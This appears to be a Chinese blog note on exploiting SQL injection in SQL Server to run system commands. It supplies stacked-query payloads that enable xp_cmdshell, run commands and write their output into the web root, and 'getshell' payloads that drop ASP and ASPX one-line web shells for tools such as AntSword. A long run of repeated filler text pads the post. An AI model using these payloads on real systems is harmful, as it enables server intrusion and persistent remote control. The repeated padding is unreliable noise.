热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

sqlserver执行系统命令

在sqlserver中是可以执行多行操作的两条sql语句可以用分号隔开sele

在sql server 中是可以执行多行操作的

两条sql语句可以用分号隔开

select * from art;select * from admin

如果要执行系统命令需要开启 xp_cmdshell

xp_cmdshell 默认在mssql2000中是可以开启的,在mssql2005之后的版本则默认禁止;

如果用户拥有管理员sa权限则可用sp_configure重新开启。

id=1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

有的时候不支持多句执行:
exec sp_configure 'show advanced options', 1; 开启高级选项
RECONFIGURE; 配置生效
exec sp_configure'xp_cmdshell', 1; 开启xp_cmdshell
RECONFIGURE; 配置生效

执行系统命令

1;EXEC master..xp_cmdshell 'ipconfig'
1;EXEC master.dbo.xp_cmdshell 'ipconfig'

页面正常,说明命令被执行成功

但是并没有限制 ipconfig 的结果;

可以通过写入到文件,在访问文件

id=1;EXEC master..xp_cmdshell 'ipconfig >>C:\inetpub\wwwroot\www.demo1.com\ip1.txt'

id=1;EXEC master.dbo.xp_cmdshell 'ipconfig >>C:\inetpub\wwwroot\www.demo1.com\ip1.txt'

getshell

最后 --后面有一个空格   --空格
id=1;exec master..xp_cmdshell 'echo ^<%eval request("pass")%^> >C:\inetpub\wwwroot\www.demo1.com\ip2.asp'--

exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["chopper"],"unsafe");%^>>D:\2.aspx' --

蚁剑测试

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!

一定要300字!一定要300字!一定要300字!一定要300字!一定要300字!




推荐阅读
  • 如何使用Ping命令来测试网络连接?当网卡安装和有关参数配置完成后,可以使用ping命令来测试一下网络是否连接成功。以winXP为例1、打开XP下DOS窗口具体操作是点击“开始”菜 ... [详细]
  • JavaScript 中创建对象的多种方法
    本文详细介绍了 JavaScript 中创建对象的几种常见方式,包括对象字面量、构造函数和 Object.create 方法,并提供了示例代码和属性描述符的解释。 ... [详细]
  • 简化报表生成:EasyReport工具的全面解析
    本文详细介绍了EasyReport,一个易于使用的开源Web报表工具。该工具支持Hadoop、HBase及多种关系型数据库,能够将SQL查询结果转换为HTML表格,并提供Excel导出、图表显示和表头冻结等功能。 ... [详细]
  • 深入解析Spring启动过程
    本文详细介绍了Spring框架的启动流程,帮助开发者理解其内部机制。通过具体示例和代码片段,解释了Bean定义、工厂类、读取器以及条件评估等关键概念,使读者能够更全面地掌握Spring的初始化过程。 ... [详细]
  • 本文探讨了在 SQL Server 中使用 JDBC 插入数据时遇到的问题。通过详细分析代码和数据库配置,提供了解决方案并解释了潜在的原因。 ... [详细]
  • 配置PHPStudy环境并使用DVWA进行Web安全测试
    本文详细介绍了如何在PHPStudy环境下配置DVWA( Damn Vulnerable Web Application ),并利用该平台进行SQL注入和XSS攻击的练习。通过此过程,读者可以熟悉常见的Web漏洞及其利用方法。 ... [详细]
  • 本文详细探讨了 org.apache.hadoop.ha.HAServiceTarget 类中的 checkFencingConfigured 方法,包括其功能、应用场景及代码示例。通过实际代码片段,帮助开发者更好地理解和使用该方法。 ... [详细]
  • 本文详细介绍了优化DB2数据库性能的多种方法,涵盖统计信息更新、缓冲池调整、日志缓冲区配置、应用程序堆大小设置、排序堆参数调整、代理程序管理、锁机制优化、活动应用程序限制、页清除程序配置、I/O服务器数量设定以及编入组提交数调整等方面。通过这些技术手段,可以显著提升数据库的运行效率和响应速度。 ... [详细]
  • 基于Node.js、Express、MongoDB和Socket.io的实时聊天应用开发
    本文详细介绍了使用Node.js、Express、MongoDB和Socket.io构建的实时聊天应用程序。涵盖项目结构、技术栈选择及关键依赖项的配置。 ... [详细]
  • 本文详细介绍了在不同操作系统中查找和设置网卡的方法,涵盖了Windows系统的具体步骤,并提供了关于网卡位置、无线网络设置及常见问题的解答。 ... [详细]
  • 探讨 HDU 1536 题目,即 S-Nim 游戏的博弈策略。通过 SG 函数分析游戏胜负的关键,并介绍如何编程实现解决方案。 ... [详细]
  • 本文详细介绍了一种通过MySQL弱口令漏洞在Windows操作系统上获取SYSTEM权限的方法。该方法涉及使用自定义UDF DLL文件来执行任意命令,从而实现对远程服务器的完全控制。 ... [详细]
  • 离线安装Grafana Cloudera Manager插件并监控CDH集群
    本文详细介绍如何离线安装Cloudera Manager (CM) 插件,并通过Grafana监控CDH集群的健康状况和资源使用情况。该插件利用CM提供的API接口进行数据获取和展示。 ... [详细]
  • 本文详细介绍了如何在云服务器上配置Nginx、Tomcat、JDK和MySQL。涵盖从下载、安装到配置的完整步骤,帮助读者快速搭建Java Web开发环境。 ... [详细]
  • 本文探讨了如何利用HTML5和JavaScript在浏览器中进行本地文件的读取和写入操作,并介绍了获取本地文件路径的方法。HTML5提供了一系列API,使得这些操作变得更加简便和安全。 ... [详细]
author-avatar
解忧花
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有